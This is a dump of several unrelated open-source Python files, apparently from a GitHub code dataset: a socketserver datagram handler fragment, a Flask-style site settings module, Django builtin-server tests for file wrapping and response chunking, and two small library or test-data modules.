        self.wfile.close()
        self.rfile.close()
class DatagramRequestHandler(BaseRequestHandler):
    # XXX Regrettably, I cannot get this working on Linux;
    # s.recvfrom() doesn't return a meaningful client address.
    """Define self.rfile and self.wfile for datagram sockets."""
    def setup(self):
        """Expose the received packet as rfile and buffer the reply in wfile."""
        # Use cStringIO when available, falling back to the pure-Python
        # StringIO (Python 2 modules).
        try:
            from cStringIO import StringIO
        except ImportError:
            from StringIO import StringIO
        # For UDP the "request" is (payload, server socket).
        self.packet, self.socket = self.request
        self.rfile = StringIO(self.packet)
        self.wfile = StringIO()
    def finish(self):
        # Everything the handler wrote to wfile goes back to the client
        # as a single datagram.
        self.socket.sendto(self.wfile.getvalue(), self.client_address)
|
codesouls/ziwuquan
|
refs/heads/master
|
web/ziwu/settings.py
|
3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Default configuration for the ziwu web application (Flask-style
setting names; see the Flask-Cache link below for cache options).

Commented-out entries document optional settings and their expected
form.
"""
import os
# Production-safe defaults: no debug/testing, verification enabled.
DEBUG = False
TESTING = False
VERIFY_EMAIL = True
VERIFY_USER = True
# Directory containing this settings file.
ROOT_FOLDER = os.path.dirname(os.path.abspath(__file__))
# Prefer a static folder relative to the working directory when it
# exists (deployment layout); otherwise fall back to the package copy.
if os.path.exists('public/static'):
    STATIC_FOLDER = os.path.join(os.getcwd(), 'public', 'static')
else:
    STATIC_FOLDER = os.path.join(ROOT_FOLDER, 'public', 'static')
#: site
SITE_TITLE = 'Ziwuquan'
SITE_URL = '/'
# SITE_URL = 'http://python-china.org/'
#: sidebar is an absolute path
# SITE_SIDEBAR = '/path/to/sidebar.html'
#: about page url
# SITE_ABOUT = '/node/about'
# SITE_ANALYTICS = 'UA-xxx-xxx'
#: session
SESSION_COOKIE_NAME = '_s'
# SESSION_COOKIE_SECURE = True
#: sessions stay valid for 30 days
PERMANENT_SESSION_LIFETIME = 3600 * 24 * 30
#: account
# NOTE(review): placeholder secrets -- these must be overridden in the
# real deployment configuration, never shipped as-is.
SECRET_KEY = 'secret key'
PASSWORD_SECRET = 'password secret'
GRAVATAR_BASE_URL = 'http://www.gravatar.com/avatar/'
GRAVATAR_EXTRA = ''
#: sqlalchemy
# SQLite database file in the current working directory.
SQLALCHEMY_DATABASE_URI = 'sqlite:///%s' % os.path.join(
    os.getcwd(), 'db.sqlite'
)
# SQLALCHEMY_POOL_SIZE = 100
# SQLALCHEMY_POOL_TIMEOUT = 10
# SQLALCHEMY_POOL_RECYCLE = 3600
#: email settings
# MAIL_SERVER = 'smtp.gmail.com'
# MAIL_USE_SSL = True
# MAIL_USERNAME = ''
# MAIL_PASSWORD = ''
# MAIL_DEFAULT_SENDER = ('name', 'noreply@email.com')
#: cache settings
# find options on http://pythonhosted.org/Flask-Cache/
# CACHE_TYPE = 'simple'
#: i18n settings
# BABEL_DEFAULT_LOCALE = 'zh'
# BABEL_SUPPORTED_LOCALES = ['zh']
|
sanjeevtripurari/hue
|
refs/heads/master
|
desktop/core/ext-py/Django-1.6.10/tests/builtin_server/tests.py
|
57
|
from __future__ import unicode_literals
from io import BytesIO
from django.core.servers.basehttp import ServerHandler, MAX_SOCKET_CHUNK_SIZE
from django.utils.unittest import TestCase
class DummyHandler(object):
    """Stub request handler whose log_request() silently accepts anything."""

    def log_request(self, *args, **kwargs):
        # Intentionally a no-op: tests only need request logging silenced.
        pass
class FileWrapperHandler(ServerHandler):
    """ServerHandler that records whether its sendfile() path was taken."""

    def __init__(self, *args, **kwargs):
        super(FileWrapperHandler, self).__init__(*args, **kwargs)
        # Not taken until sendfile() is actually invoked.
        self._used_sendfile = False
        self.request_handler = DummyHandler()

    def sendfile(self):
        # Pretend the platform sendfile succeeded, and remember the call.
        self._used_sendfile = True
        return True
def wsgi_app(environ, start_response):
    """Minimal WSGI application returning a one-chunk plain-text body."""
    headers = [(str('Content-Type'), str('text/plain'))]
    start_response(str('200 OK'), headers)
    return [b'Hello World!']
def wsgi_app_file_wrapper(environ, start_response):
    """WSGI app that serves its body through environ['wsgi.file_wrapper']."""
    start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
    wrapper = environ['wsgi.file_wrapper']
    return wrapper(BytesIO(b'foo'))
class WSGIFileWrapperTests(TestCase):
    """
    Test that the wsgi.file_wrapper works for the builtin server.

    Tests for #9659: wsgi.file_wrapper in the builtin server.
    We need to mock a couple of handlers and keep track of what
    gets called when using a couple kinds of WSGI apps.
    """

    def test_file_wrapper_uses_sendfile(self):
        environ = {'SERVER_PROTOCOL': 'HTTP/1.0'}
        handler = FileWrapperHandler(None, BytesIO(), BytesIO(), environ)
        handler.run(wsgi_app_file_wrapper)
        # The file_wrapper app must take the sendfile() fast path and
        # therefore write nothing through the normal stdout channel.
        self.assertTrue(handler._used_sendfile)
        self.assertEqual(handler.stdout.getvalue(), b'')
        self.assertEqual(handler.stderr.getvalue(), b'')

    def test_file_wrapper_no_sendfile(self):
        environ = {'SERVER_PROTOCOL': 'HTTP/1.0'}
        handler = FileWrapperHandler(None, BytesIO(), BytesIO(), environ)
        handler.run(wsgi_app)
        # A plain iterable response must not use sendfile(); the body
        # ends up as the last line written to stdout.
        self.assertFalse(handler._used_sendfile)
        self.assertEqual(handler.stdout.getvalue().splitlines()[-1],
                         b'Hello World!')
        self.assertEqual(handler.stderr.getvalue(), b'')
class WriteChunkCounterHandler(ServerHandler):
    """
    Server handler that counts the number of chunks written after headers were
    sent. Used to make sure large response body chunking works properly.
    """

    def __init__(self, *args, **kwargs):
        super(WriteChunkCounterHandler, self).__init__(*args, **kwargs)
        self.request_handler = DummyHandler()
        self.write_chunk_counter = 0
        self.headers_written = False

    def send_headers(self):
        super(WriteChunkCounterHandler, self).send_headers()
        # From here on every _write() call carries a body chunk.
        self.headers_written = True

    def _write(self, data):
        if self.headers_written:
            # Body chunk: count it; header writes happen before the flag
            # flips and are ignored.
            self.write_chunk_counter += 1
        self.stdout.write(data)
def send_big_data_app(environ, start_response):
    """WSGI app whose body is 1.5x MAX_SOCKET_CHUNK_SIZE, forcing chunking."""
    start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
    # A blob 1.5 times the maximum chunk size, so the server has to
    # split it across two writes.
    blob_length = MAX_SOCKET_CHUNK_SIZE + MAX_SOCKET_CHUNK_SIZE // 2
    return [b'x' * blob_length]
class ServerHandlerChunksProperly(TestCase):
    """
    Test that the ServerHandler chunks data properly.

    Tests for #18972: The logic that performs the math to break data into
    32MB (MAX_SOCKET_CHUNK_SIZE) chunks was flawed, BUT it didn't actually
    cause any problems.
    """

    def test_chunked_data(self):
        environ = {'SERVER_PROTOCOL': 'HTTP/1.0'}
        handler = WriteChunkCounterHandler(None, BytesIO(), BytesIO(), environ)
        handler.run(send_big_data_app)
        # 1.5x the chunk size must be emitted in exactly two writes.
        self.assertEqual(handler.write_chunk_counter, 2)
|
FHannes/intellij-community
|
refs/heads/master
|
python/testData/inspections/unusedImport/subpackageInInitPy/module_a.py
|
83
|
#! /usr/bin/env python
from package1 import ClassB
# Module-level instance of ClassB, created when this module is imported.
b = ClassB()
|
yuxiang-zhou/menpo
|
refs/heads/master
|
menpo/feature/predefined.py
|
4
|
from menpo.base import partial_doc
from .features import igo, hog

# Predefined feature callables built by binding keyword arguments onto the
# base feature functions. partial_doc presumably also carries over the
# wrapped function's docstring -- see menpo.base.partial_doc.
double_igo = partial_doc(igo, double_angles=True)
sparse_hog = partial_doc(hog, mode='sparse')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.